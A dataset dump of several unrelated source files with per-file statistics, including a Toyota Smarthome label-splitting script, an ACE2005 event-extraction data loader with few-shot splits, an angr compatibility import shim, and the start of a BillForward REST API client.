camera_id = int(splited_filename[4][1:])
if camera_id in [1, 2, 5]:
# for indexing
if not activityname in activitynames:
activitynames.append(activityname)
# making label
label = "{},{},{}".format(filename, activitynames.index(activityname), activityname)
# train
if camera_id == 1:
trains.append(label)
# validation
if camera_id == 5:
vals.append(label)
# test
if camera_id == 2:
tests.append(label)
print(f"[cross view 1] train: {len(trains)}, test: {len(tests)}, val: {len(vals)}, categories: {len(activitynames)}")
# save
with open(os.path.join(save_path, "train.csv"), "w") as f:
f.writelines("\n".join(trains))
with open(os.path.join(save_path, "val.csv"), "w") as f:
f.writelines("\n".join(vals))
with open(os.path.join(save_path, "test.csv"), "w") as f:
f.writelines("\n".join(tests))
def cross_view2(files_root_path: str, save_path: str):
# path check
if not os.path.exists(save_path):
os.makedirs(save_path)
# read a files path(root path of the toyotasmarthome files)
files_path = glob(os.path.join(files_root_path, "*"))
trains = []; vals = []; tests = []; activitynames = []
for file_path in files_path:
filename = file_path.split("/")[-1]
# Activityname_p[id]_r[XX]_[XX]_c[0-7]
splited_filename = filename.split("_")
# get a activityname from splited filename
activityname = splited_filename[0]
# get a camera id from splited filename
camera_id = int(splited_filename[4][1:])
if camera_id in [1, 2, 3, 4, 5, 6, 7]:
# for indexing
if not activityname in activitynames:
activitynames.append(activityname)
# making label
label = "{},{},{}".format(filename, activitynames.index(activityname), activityname)
# train
if camera_id in [1, 3, 4, 6, 7]:
trains.append(label)
# validation
if camera_id == 5:
vals.append(label)
# test
if camera_id == 2:
tests.append(label)
print(f"[cross view 1] train: {len(trains)}, test: {len(tests)}, val: {len(vals)}, categories: {len(activitynames)}")
# save
with open(os.path.join(save_path, "train.csv"), "w") as f:
f.writelines("\n".join(trains))
with open(os.path.join(save_path, "val.csv"), "w") as f:
f.writelines("\n".join(vals))
with open(os.path.join(save_path, "test.csv"), "w") as f:
f.writelines("\n".join(tests))
def custom_split(files_root_path: str, save_path: str, shuffle: bool, test_size: float):
# path check
if not os.path.exists(save_path):
os.makedirs(save_path)
# read a files path(root path of the toyotasmarthome files)
files_path = glob(os.path.join(files_root_path, "*"))
datas_x = []; datas_y = []; activitynames = []
for file_path in files_path:
filename = file_path.split("/")[-1]
# Activityname_p[id]_r[XX]_[XX]_c[0-7]
splited_filename = filename.split("_")
# get a activityname from splited filename
activityname = splited_filename[0]
# for indexing
if not activityname in activitynames:
activitynames.append(activityname)
index = activitynames.index(activityname)
# making label
label = "{},{},{}".format(filename, index, activityname)
# append
datas_x.append(label)
datas_y.append(index)
trains, tests, _, _ = train_test_split(datas_x, datas_y, shuffle=shuffle, test_size=test_size)
print(f"[custom split] train: {len(trains)}, test: {len(tests)}, categories: {len(activitynames)}, test size: {test_size}")
# save
with open(os.path.join(save_path, "train.csv"), "w") as f:
f.writelines("\n".join(trains))
with open(os.path.join(save_path, "test.csv"), "w") as f:
f.writelines("\n".join(tests))
#=========================================
# run labeler
#=========================================
# labels for RGB frames(this result is will be can used for "depth" or "skeleton" dataset)
cross_subject(files_root_path = "./mp4_frames/", save_path = "./Labels/cross_subject/")
cross_view1(files_root_path = "./mp4_frames/", save_path = "./Labels/cross_view1/")
cross_view2(files_root_path = "./mp4_frames/", save_path = "./Labels/cross_view2/")
custom_split(files_root_path = "./mp4_frames/", save_path = "./Labels/custom_split_7_3/", shuffle=True, test_size=0.3)
| 35.856481
| 127
| 0.572111
| 968
| 7,745
| 4.42562
| 0.136364
| 0.048553
| 0.042484
| 0.03268
| 0.801821
| 0.781279
| 0.771475
| 0.765173
| 0.756769
| 0.709851
| 0
| 0.017958
| 0.245061
| 7,745
| 216
| 128
| 35.856481
| 0.714726
| 0.240155
| 0
| 0.740385
| 0
| 0.038462
| 0.122982
| 0.019237
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.028846
| 0
| 0.067308
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c139735ef3c08ed36a2e3ae40c32f13060eda8ea
| 136
|
py
|
Python
|
simuvex/simuvex/concretization_strategies/nonzero_range.py
|
Ruide/angr-dev
|
964dc80c758e25c698c2cbcc454ef5954c5fa0a0
|
[
"BSD-2-Clause"
] | 86
|
2015-08-06T23:25:07.000Z
|
2022-02-17T14:58:22.000Z
|
simuvex/simuvex/concretization_strategies/nonzero_range.py
|
Ruide/angr-dev
|
964dc80c758e25c698c2cbcc454ef5954c5fa0a0
|
[
"BSD-2-Clause"
] | 132
|
2015-09-10T19:06:59.000Z
|
2018-10-04T20:36:45.000Z
|
simuvex/simuvex/concretization_strategies/nonzero_range.py
|
Ruide/angr-dev
|
964dc80c758e25c698c2cbcc454ef5954c5fa0a0
|
[
"BSD-2-Clause"
] | 80
|
2015-08-07T10:30:20.000Z
|
2020-03-21T14:45:28.000Z
|
print '... Importing simuvex/concretization_strategies/nonzero_range.py ...'
from angr.concretization_strategies.nonzero_range import *
| 45.333333
| 76
| 0.830882
| 15
| 136
| 7.266667
| 0.733333
| 0.440367
| 0.568807
| 0.66055
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066176
| 136
| 2
| 77
| 68
| 0.858268
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.367647
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 8
|
c148aefe419cae2ac13e70ddb78d033beba8987f
| 28,485
|
py
|
Python
|
data_load.py
|
Ronzey/Module-based-few-shot-event-extraction
|
b2319f6cfb682920fffd867736f9e02246e2142c
|
[
"MIT"
] | 1
|
2021-02-13T13:18:00.000Z
|
2021-02-13T13:18:00.000Z
|
data_load.py
|
Ronzey/Module-based-few-shot-event-extraction
|
b2319f6cfb682920fffd867736f9e02246e2142c
|
[
"MIT"
] | null | null | null |
data_load.py
|
Ronzey/Module-based-few-shot-event-extraction
|
b2319f6cfb682920fffd867736f9e02246e2142c
|
[
"MIT"
] | 3
|
2020-10-20T15:51:53.000Z
|
2021-09-30T08:35:34.000Z
|
import numpy as np
import torch
from torch.utils import data
import json
import copy
from consts import NONE, PAD, CLS, SEP, UNK, TRIGGERS, ARGUMENTS, ENTITIES, POSTAGS, SRL_ARGUMENTS
from utils import build_vocab, srl_find_trigger, srl_find_argument, srl_split_role
from pytorch_pretrained_bert import BertTokenizer
# init vocab
all_triggers, trigger2idx, idx2trigger = build_vocab(TRIGGERS)
all_entities, entity2idx, idx2entity = build_vocab(ENTITIES)
all_postags, postag2idx, idx2postag = build_vocab(POSTAGS, BIO_tagging=False)
all_srl, srl2idx, idx2srl = build_vocab(SRL_ARGUMENTS, BIO_tagging=False)
all_triggers_noBIO, trigger2idx_noBIO, idx2trigger_noBIO = build_vocab(TRIGGERS, BIO_tagging=False)
#all_arguments, argument2idx, idx2argument = build_vocab(ARGUMENTS, BIO_tagging=False)
tokenizer = BertTokenizer.from_pretrained('bert-base-cased', do_lower_case=False, never_split=(PAD, CLS, SEP, UNK))
class ACE2005Dataset(data.Dataset):
def __init__(self, fpath, all_arguments, argument2idx, fpath_mix=None, indices=None):
self.sent_li, self.entities_li, self.postags_li, self.triggers_li, self.arguments_li, self.srl_arguments_li, self.srl_triggers_li = [], [], [], [], [], [], []
if fpath_mix:
fpath_list = [fpath, fpath_mix]
else:
fpath_list = [fpath]
for _fpath in fpath_list:
with open(_fpath, 'r') as f:
data = json.load(f)
for item in data:
words = item['words']
entities = [[NONE] for _ in range(len(words))]
triggers = [NONE] * len(words)
postags = item['pos-tags']
arguments = {
'candidates': [
# ex. (5, 6, "entity_type_str"), ...
],
'events': {
# ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
},
}
srl_arguments = {
'candidates': [
# ex. (5, 6, "entity_type_str"), ...
],
'events': {
# ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
},
}
srl_triggers_single_seq = [] # ex. [[verb1_srl_tag1, ..., verb1_srl_tagn],[verb2_srl_tag1, ..., verb2_srl_tagn],...]
for entity_mention in item['golden-entity-mentions']:
arguments['candidates'].append((entity_mention['start'], entity_mention['end'], entity_mention['entity-type']))
for i in range(entity_mention['start'], entity_mention['end']):
entity_type = entity_mention['entity-type']
if i == entity_mention['start']:
entity_type = 'B-{}'.format(entity_type)
else:
entity_type = 'I-{}'.format(entity_type)
if len(entities[i]) == 1 and entities[i][0] == NONE:
entities[i][0] = entity_type
else:
entities[i].append(entity_type)
for event_mention in item['golden-event-mentions']:
for i in range(event_mention['trigger']['start'], event_mention['trigger']['end']):
trigger_type = event_mention['event_type']
if i == event_mention['trigger']['start']:
triggers[i] = 'B-{}'.format(trigger_type)
else:
triggers[i] = 'I-{}'.format(trigger_type)
event_key = (event_mention['trigger']['start'], event_mention['trigger']['end'], event_mention['event_type'])
arguments['events'][event_key] = []
for argument in event_mention['arguments']:
role = argument['role']
if role.startswith('Time'):
role = role.split('-')[0]
if role in all_arguments:
arguments['events'][event_key].append((argument['start'], argument['end'], argument2idx[role]))
for srl_item in item['srl']:
srl_trigger_start, srl_trigger_end = srl_find_trigger(srl_item['tags'])
if srl_trigger_start != None:
event_key = (srl_trigger_start, srl_trigger_end, srl_item['verb'])
argument_list = srl_find_argument(srl_item['tags'])
srl_arguments['events'][event_key] = []
for argument in argument_list:
srl_arguments['events'][event_key].append(argument)
for srl_item in item['srl']:
srl_triggers = []
for tag in srl_item['tags']:
# split the BI tag and the CR middle tag
tag = srl_split_role(tag)
srl_triggers.append(tag)
srl_triggers_single_seq.append(srl_triggers)
if srl_triggers_single_seq==[]:
srl_triggers_single_seq=[[]] # reshape
self.sent_li.append([CLS] + words + [SEP])
self.entities_li.append([[PAD]] + entities + [[PAD]])
self.postags_li.append([PAD] + postags + [PAD])
self.triggers_li.append(triggers)
self.arguments_li.append(arguments)
self.srl_arguments_li.append(srl_arguments)
self.srl_triggers_li.append(srl_triggers_single_seq)
if indices:
new_sent_li = [self.sent_li[index] for index in indices]
new_entities_li = [self.entities_li[index] for index in indices]
new_postags_li = [self.postags_li[index] for index in indices]
new_triggers_li = [self.triggers_li[index] for index in indices]
new_arguments_li = [self.arguments_li[index] for index in indices]
new_srl_arguments_li = [self.srl_arguments_li[index] for index in indices]
new_srl_triggers_li = [self.srl_triggers_li[index] for index in indices]
self.sent_li = new_sent_li
self.entities_li = new_entities_li
self.postags_li = new_postags_li
self.triggers_li = new_triggers_li
self.arguments_li = new_arguments_li
self.srl_arguments_li = new_srl_arguments_li
self.srl_triggers_li = new_srl_triggers_li
def __len__(self):
return len(self.sent_li)
def __getitem__(self, idx):
words, entities, postags, triggers, arguments, srl_arguments, srl_triggers_single_seq = self.sent_li[idx], self.entities_li[idx], self.postags_li[idx], self.triggers_li[idx], self.arguments_li[idx], self.srl_arguments_li[idx], self.srl_triggers_li[idx]
# We give credits only to the first piece.
tokens_x, entities_x, postags_x, is_heads = [], [], [], []
for w, e, p in zip(words, entities, postags):
tokens = tokenizer.tokenize(w) if w not in [CLS, SEP] else [w]
tokens_xx = tokenizer.convert_tokens_to_ids(tokens)
if w in [CLS, SEP]:
is_head = [0]
else:
is_head = [1] + [0] * (len(tokens) - 1)
p = [p] + [PAD] * (len(tokens) - 1)
e = [e] + [[PAD]] * (len(tokens) - 1) # <PAD>: no decision
p = [postag2idx[postag] for postag in p]
e = [[entity2idx[entity] for entity in entities] for entities in e]
tokens_x.extend(tokens_xx), postags_x.extend(p), entities_x.extend(e), is_heads.extend(is_head)
triggers_y = [trigger2idx[t] for t in triggers]
# convert srl tag to index
new_srl = copy.deepcopy(srl_triggers_single_seq)
for i, item in enumerate(srl_triggers_single_seq):
for j, tag in enumerate(item):
if tag!='V':
new_srl[i][j] = srl2idx[tag]
else:
new_srl[i][j] = srl2idx[NONE]
# new_srl[i][j] = srl2idx[tag]
head_indexes = []
for i in range(len(is_heads)):
if is_heads[i]:
head_indexes.append(i)
seqlen = len(tokens_x)
return tokens_x, entities_x, postags_x, triggers_y, arguments, seqlen, head_indexes, words, triggers, srl_arguments, new_srl
def get_samples_weight(self):
samples_weight = []
for triggers in self.triggers_li:
not_none = False
for trigger in triggers:
if trigger != NONE:
not_none = True
break
if not_none:
samples_weight.append(5.0)
else:
samples_weight.append(1.0)
return np.array(samples_weight)
class ACE2005DatasetBase(data.Dataset):
def __init__(self, fpath, all_arguments, argument2idx, fpath_mix=None, indices=None, base_event=None):
self.sent_li, self.entities_li, self.postags_li, self.triggers_li, self.arguments_li, self.srl_arguments_li, self.srl_triggers_li = [], [], [], [], [], [], []
if fpath_mix:
fpath_list = [fpath, fpath_mix]
else:
fpath_list = [fpath]
for _fpath in fpath_list:
with open(_fpath, 'r') as f:
data = json.load(f)
for item in data:
words = item['words']
entities = [[NONE] for _ in range(len(words))]
triggers = [NONE] * len(words)
postags = item['pos-tags']
arguments = {
'candidates': [
# ex. (5, 6, "entity_type_str"), ...
],
'events': {
# ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
},
}
srl_arguments = {
'candidates': [
# ex. (5, 6, "entity_type_str"), ...
],
'events': {
# ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
},
}
srl_triggers_single_seq = [] # ex. [[verb1_srl_tag1, ..., verb1_srl_tagn],[verb2_srl_tag1, ..., verb2_srl_tagn],...]
base_flag = True
for entity_mention in item['golden-entity-mentions']:
arguments['candidates'].append((entity_mention['start'], entity_mention['end'], entity_mention['entity-type']))
for i in range(entity_mention['start'], entity_mention['end']):
entity_type = entity_mention['entity-type']
if i == entity_mention['start']:
entity_type = 'B-{}'.format(entity_type)
else:
entity_type = 'I-{}'.format(entity_type)
if len(entities[i]) == 1 and entities[i][0] == NONE:
entities[i][0] = entity_type
else:
entities[i].append(entity_type)
for event_mention in item['golden-event-mentions']:
for i in range(event_mention['trigger']['start'], event_mention['trigger']['end']):
trigger_type = event_mention['event_type']
if trigger_type not in base_event:
base_flag = False
if i == event_mention['trigger']['start']:
triggers[i] = 'B-{}'.format(trigger_type)
else:
triggers[i] = 'I-{}'.format(trigger_type)
event_key = (event_mention['trigger']['start'], event_mention['trigger']['end'], event_mention['event_type'])
arguments['events'][event_key] = []
for argument in event_mention['arguments']:
role = argument['role']
if role.startswith('Time'):
role = role.split('-')[0]
if role in all_arguments:
arguments['events'][event_key].append((argument['start'], argument['end'], argument2idx[role]))
for srl_item in item['srl']:
srl_trigger_start, srl_trigger_end = srl_find_trigger(srl_item['tags'])
if srl_trigger_start != None:
event_key = (srl_trigger_start, srl_trigger_end, srl_item['verb'])
argument_list = srl_find_argument(srl_item['tags'])
srl_arguments['events'][event_key] = []
for argument in argument_list:
srl_arguments['events'][event_key].append(argument)
for srl_item in item['srl']:
srl_triggers = []
for tag in srl_item['tags']:
# split the BI tag and the CR middle tag
tag = srl_split_role(tag)
srl_triggers.append(tag)
srl_triggers_single_seq.append(srl_triggers)
if srl_triggers_single_seq==[]:
srl_triggers_single_seq=[[]] # reshape
if base_flag:
self.sent_li.append([CLS] + words + [SEP])
self.entities_li.append([[PAD]] + entities + [[PAD]])
self.postags_li.append([PAD] + postags + [PAD])
self.triggers_li.append(triggers)
self.arguments_li.append(arguments)
self.srl_arguments_li.append(srl_arguments)
self.srl_triggers_li.append(srl_triggers_single_seq)
if indices:
new_sent_li = [self.sent_li[index] for index in indices]
new_entities_li = [self.entities_li[index] for index in indices]
new_postags_li = [self.postags_li[index] for index in indices]
new_triggers_li = [self.triggers_li[index] for index in indices]
new_arguments_li = [self.arguments_li[index] for index in indices]
new_srl_arguments_li = [self.srl_arguments_li[index] for index in indices]
new_srl_triggers_li = [self.srl_triggers_li[index] for index in indices]
self.sent_li = new_sent_li
self.entities_li = new_entities_li
self.postags_li = new_postags_li
self.triggers_li = new_triggers_li
self.arguments_li = new_arguments_li
self.srl_arguments_li = new_srl_arguments_li
self.srl_triggers_li = new_srl_triggers_li
def __len__(self):
return len(self.sent_li)
def __getitem__(self, idx):
words, entities, postags, triggers, arguments, srl_arguments, srl_triggers_single_seq = self.sent_li[idx], self.entities_li[idx], self.postags_li[idx], self.triggers_li[idx], self.arguments_li[idx], self.srl_arguments_li[idx], self.srl_triggers_li[idx]
# We give credits only to the first piece.
tokens_x, entities_x, postags_x, is_heads = [], [], [], []
for w, e, p in zip(words, entities, postags):
tokens = tokenizer.tokenize(w) if w not in [CLS, SEP] else [w]
tokens_xx = tokenizer.convert_tokens_to_ids(tokens)
if w in [CLS, SEP]:
is_head = [0]
else:
is_head = [1] + [0] * (len(tokens) - 1)
p = [p] + [PAD] * (len(tokens) - 1)
e = [e] + [[PAD]] * (len(tokens) - 1) # <PAD>: no decision
p = [postag2idx[postag] for postag in p]
e = [[entity2idx[entity] for entity in entities] for entities in e]
tokens_x.extend(tokens_xx), postags_x.extend(p), entities_x.extend(e), is_heads.extend(is_head)
triggers_y = [trigger2idx[t] for t in triggers]
# convert srl tag to index
new_srl = copy.deepcopy(srl_triggers_single_seq)
for i, item in enumerate(srl_triggers_single_seq):
for j, tag in enumerate(item):
new_srl[i][j] = srl2idx[tag]
# if tag!='V':
# new_srl[i][j] = srl2idx[tag]
# else:
# new_srl[i][j] = srl2idx[NONE]
head_indexes = []
for i in range(len(is_heads)):
if is_heads[i]:
head_indexes.append(i)
seqlen = len(tokens_x)
return tokens_x, entities_x, postags_x, triggers_y, arguments, seqlen, head_indexes, words, triggers, srl_arguments, new_srl
def get_samples_weight(self):
samples_weight = []
for triggers in self.triggers_li:
not_none = False
for trigger in triggers:
if trigger != NONE:
not_none = True
break
if not_none:
samples_weight.append(5.0)
else:
samples_weight.append(1.0)
return np.array(samples_weight)
class ACE2005DatasetNovel(data.Dataset):
def __init__(self, fpath, all_arguments, argument2idx, fpath_mix=None, indices=None, novel_event=None, novel_shot=5):
self.sent_li, self.entities_li, self.postags_li, self.triggers_li, self.arguments_li, self.srl_arguments_li, self.srl_triggers_li = [], [], [], [], [], [], []
if fpath_mix:
fpath_list = [fpath, fpath_mix]
else:
fpath_list = [fpath]
novel_event_count = {item: 0 for item in novel_event}
for _fpath in fpath_list:
with open(_fpath, 'r') as f:
data = json.load(f)
for item in data:
words = item['words']
entities = [[NONE] for _ in range(len(words))]
triggers = [NONE] * len(words)
postags = item['pos-tags']
arguments = {
'candidates': [
# ex. (5, 6, "entity_type_str"), ...
],
'events': {
# ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
},
}
srl_arguments = {
'candidates': [
# ex. (5, 6, "entity_type_str"), ...
],
'events': {
# ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
},
}
srl_triggers_single_seq = [] # ex. [[verb1_srl_tag1, ..., verb1_srl_tagn],[verb2_srl_tag1, ..., verb2_srl_tagn],...]
novel_flag = False
temp_novel_event = [] # count the novel event in this data item
for entity_mention in item['golden-entity-mentions']:
arguments['candidates'].append((entity_mention['start'], entity_mention['end'], entity_mention['entity-type']))
for i in range(entity_mention['start'], entity_mention['end']):
entity_type = entity_mention['entity-type']
if i == entity_mention['start']:
entity_type = 'B-{}'.format(entity_type)
else:
entity_type = 'I-{}'.format(entity_type)
if len(entities[i]) == 1 and entities[i][0] == NONE:
entities[i][0] = entity_type
else:
entities[i].append(entity_type)
for event_mention in item['golden-event-mentions']:
for i in range(event_mention['trigger']['start'], event_mention['trigger']['end']):
trigger_type = event_mention['event_type']
if i == event_mention['trigger']['start']:
triggers[i] = 'B-{}'.format(trigger_type)
else:
triggers[i] = 'I-{}'.format(trigger_type)
if trigger_type in novel_event:
novel_flag = True
temp_novel_event.append(trigger_type)
#novel_event_count[trigger_type] += 1
event_key = (event_mention['trigger']['start'], event_mention['trigger']['end'], event_mention['event_type'])
arguments['events'][event_key] = []
for argument in event_mention['arguments']:
role = argument['role']
if role.startswith('Time'):
role = role.split('-')[0]
if role in all_arguments:
arguments['events'][event_key].append((argument['start'], argument['end'], argument2idx[role]))
for srl_item in item['srl']:
srl_trigger_start, srl_trigger_end = srl_find_trigger(srl_item['tags'])
if srl_trigger_start != None:
event_key = (srl_trigger_start, srl_trigger_end, srl_item['verb'])
argument_list = srl_find_argument(srl_item['tags'])
srl_arguments['events'][event_key] = []
for argument in argument_list:
srl_arguments['events'][event_key].append(argument)
for srl_item in item['srl']:
srl_triggers = []
for tag in srl_item['tags']:
# split the BI tag and the CR middle tag
tag = srl_split_role(tag)
srl_triggers.append(tag)
srl_triggers_single_seq.append(srl_triggers)
if srl_triggers_single_seq==[]:
srl_triggers_single_seq=[[]] # reshape
if novel_flag:
for key, value in novel_event_count.items():
if int(value) < novel_shot and key in set(temp_novel_event):
self.sent_li.append([CLS] + words + [SEP])
self.entities_li.append([[PAD]] + entities + [[PAD]])
self.postags_li.append([PAD] + postags + [PAD])
self.triggers_li.append(triggers)
self.arguments_li.append(arguments)
self.srl_arguments_li.append(srl_arguments)
self.srl_triggers_li.append(srl_triggers_single_seq)
for temp_novel_event_item in set(temp_novel_event):
novel_event_count[temp_novel_event_item] += 1
# if max(novel_event_count.values()) > novel_shot:
# print('-------Novel Event Type Overload-------\n')
# print(novel_event_count)
if indices:
new_sent_li = [self.sent_li[index] for index in indices]
new_entities_li = [self.entities_li[index] for index in indices]
new_postags_li = [self.postags_li[index] for index in indices]
new_triggers_li = [self.triggers_li[index] for index in indices]
new_arguments_li = [self.arguments_li[index] for index in indices]
new_srl_arguments_li = [self.srl_arguments_li[index] for index in indices]
new_srl_triggers_li = [self.srl_triggers_li[index] for index in indices]
self.sent_li = new_sent_li
self.entities_li = new_entities_li
self.postags_li = new_postags_li
self.triggers_li = new_triggers_li
self.arguments_li = new_arguments_li
self.srl_arguments_li = new_srl_arguments_li
self.srl_triggers_li = new_srl_triggers_li
def __len__(self):
return len(self.sent_li)
def __getitem__(self, idx):
words, entities, postags, triggers, arguments, srl_arguments, srl_triggers_single_seq = self.sent_li[idx], self.entities_li[idx], self.postags_li[idx], self.triggers_li[idx], self.arguments_li[idx], self.srl_arguments_li[idx], self.srl_triggers_li[idx]
# We give credits only to the first piece.
tokens_x, entities_x, postags_x, is_heads = [], [], [], []
for w, e, p in zip(words, entities, postags):
tokens = tokenizer.tokenize(w) if w not in [CLS, SEP] else [w]
tokens_xx = tokenizer.convert_tokens_to_ids(tokens)
if w in [CLS, SEP]:
is_head = [0]
else:
is_head = [1] + [0] * (len(tokens) - 1)
p = [p] + [PAD] * (len(tokens) - 1)
e = [e] + [[PAD]] * (len(tokens) - 1) # <PAD>: no decision
p = [postag2idx[postag] for postag in p]
e = [[entity2idx[entity] for entity in entities] for entities in e]
tokens_x.extend(tokens_xx), postags_x.extend(p), entities_x.extend(e), is_heads.extend(is_head)
triggers_y = [trigger2idx[t] for t in triggers]
# convert srl tag to index
new_srl = copy.deepcopy(srl_triggers_single_seq)
for i, item in enumerate(srl_triggers_single_seq):
for j, tag in enumerate(item):
# if tag!='V':
# new_srl[i][j] = srl2idx[tag]
# else:
# new_srl[i][j] = srl2idx[NONE]
new_srl[i][j] = srl2idx[tag]
head_indexes = []
for i in range(len(is_heads)):
if is_heads[i]:
head_indexes.append(i)
seqlen = len(tokens_x)
return tokens_x, entities_x, postags_x, triggers_y, arguments, seqlen, head_indexes, words, triggers, srl_arguments, new_srl
def get_samples_weight(self):
samples_weight = []
for triggers in self.triggers_li:
not_none = False
for trigger in triggers:
if trigger != NONE:
not_none = True
break
if not_none:
samples_weight.append(5.0)
else:
samples_weight.append(1.0)
return np.array(samples_weight)
def pad(batch):
tokens_x_2d, entities_x_3d, postags_x_2d, triggers_y_2d, arguments_2d, seqlens_1d, head_indexes_2d, words_2d, triggers_2d, srl_arg_2d, srl_triggers_2d = list(map(list, zip(*batch)))
maxlen = np.array(seqlens_1d).max()
for i in range(len(tokens_x_2d)):
tokens_x_2d[i] = tokens_x_2d[i] + [0] * (maxlen - len(tokens_x_2d[i]))
postags_x_2d[i] = postags_x_2d[i] + [0] * (maxlen - len(postags_x_2d[i]))
head_indexes_2d[i] = head_indexes_2d[i] + [0] * (maxlen - len(head_indexes_2d[i]))
triggers_y_2d[i] = triggers_y_2d[i] + [trigger2idx[PAD]] * (maxlen - len(triggers_y_2d[i]))
entities_x_3d[i] = entities_x_3d[i] + [[entity2idx[PAD]] for _ in range(maxlen - len(entities_x_3d[i]))]
for j, item in enumerate(srl_triggers_2d[i]):
srl_triggers_2d[i][j] = item + [srl2idx[PAD]] * (maxlen - len(item))
return tokens_x_2d, entities_x_3d, postags_x_2d, \
triggers_y_2d, arguments_2d, \
seqlens_1d, head_indexes_2d, \
words_2d, triggers_2d, srl_arg_2d, srl_triggers_2d
| 49.712042
| 260
| 0.516588
| 3,169
| 28,485
| 4.354055
| 0.059325
| 0.046239
| 0.02957
| 0.034788
| 0.890999
| 0.882592
| 0.875344
| 0.87346
| 0.87346
| 0.87346
| 0
| 0.010974
| 0.376198
| 28,485
| 572
| 261
| 49.798951
| 0.765547
| 0.062349
| 0
| 0.857461
| 0
| 0
| 0.035031
| 0.004838
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028953
| false
| 0
| 0.017817
| 0.006682
| 0.075724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c148c748dd17409ef1adae6bc9b10067a8f1d2f9
| 104
|
py
|
Python
|
initiate.py
|
AeshanaShalindra/Smart_questionnaire_NLP
|
222344b9696b101906bdce1b3678fcb3d6eb7b14
|
[
"MIT"
] | 3
|
2018-09-22T16:59:36.000Z
|
2018-12-06T09:46:14.000Z
|
initiate.py
|
AeshanaShalindra/Smart_questionnaire_NLP
|
222344b9696b101906bdce1b3678fcb3d6eb7b14
|
[
"MIT"
] | null | null | null |
initiate.py
|
AeshanaShalindra/Smart_questionnaire_NLP
|
222344b9696b101906bdce1b3678fcb3d6eb7b14
|
[
"MIT"
] | null | null | null |
import nltk
nltk.download('wordnet') # first-time use only
nltk.download('punkt') # first-time use only
| 26
| 46
| 0.75
| 16
| 104
| 4.875
| 0.5625
| 0.307692
| 0.307692
| 0.410256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 104
| 3
| 47
| 34.666667
| 0.847826
| 0.375
| 0
| 0
| 0
| 0
| 0.193548
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
c18ded3f1ef2ac14ec4c90477f178bf948f5a2f7
| 39,575
|
py
|
Python
|
billforward/apis/synch_jobs_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | 2
|
2016-11-23T17:32:37.000Z
|
2022-02-24T05:13:20.000Z
|
billforward/apis/synch_jobs_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | null | null | null |
billforward/apis/synch_jobs_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | 1
|
2016-12-30T20:02:48.000Z
|
2016-12-30T20:02:48.000Z
|
# coding: utf-8
"""
BillForward REST API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class SynchJobsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_sync_job(self, synch_job, **kwargs):
"""
Create a synch job.
{\"nickname\":\"Create a new sync job\",\"request\":\"createSynchJobRequest.html\",\"response\":\"createSynchJobResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_sync_job(synch_job, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param MutableBillingEntity synch_job: The data synch job object to be created. (required)
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
